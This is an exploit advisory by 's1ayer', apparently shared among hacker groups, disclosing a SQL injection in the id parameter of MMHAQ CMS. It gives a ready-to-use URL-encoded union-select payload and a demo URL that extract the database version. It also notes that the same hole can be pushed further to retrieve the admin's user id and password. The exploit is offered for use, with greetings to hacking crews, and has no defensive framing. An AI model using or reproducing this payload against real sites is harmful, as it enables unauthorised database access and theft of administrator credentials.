29 lines
1.2 KiB
Text
Executable file
29 lines
1.2 KiB
Text
Executable file
########################################################
|
|
MMHAQ CMS sqli vulnersbility
|
|
########################################################
|
|
|
|
[+]Title: MMHAQ CMS sqli vulnersbility
|
|
[+]Version: only one version is released
|
|
[+]Download: http://www.mmhaq.net/index.php?page=pack_linux
|
|
[+]Author: s1ayer
|
|
[+]Contact: s1ayer.icw@gmail.com
|
|
########################################################
|
|
Description:
|
|
MMHAQ CMS fully functional Content Management System in PHP on top of MySQL.
|
|
Including articles, news, file management and all of the general functionalities of a CMS.
|
|
It is completely accessible and very easy to use on a daily basis.
|
|
########################################################
|
|
|
|
#[Exploit] :
|
|
|
|
[Bug] = index.php?id=SQL]
|
|
|
|
[SQL] = -1%20union%20all%20select%201,version(),3,4,5,6--
|
|
|
|
#[Demo] :
|
|
|
|
[+] http://127.0.0.1/index.php?id=-1%20union%20all%20select%201,version(),3,4,5,6--
|
|
|
|
Explanation:Version of the database can be seen at the title bar of the browser, this exploit can be further exploited to gain the user id and password of the admin.
|
|
|
|
GREETZ: r45c4l,b0nd,sai,sm4rt,fb1,jappan, and all ICW and andhrhahackers members.
|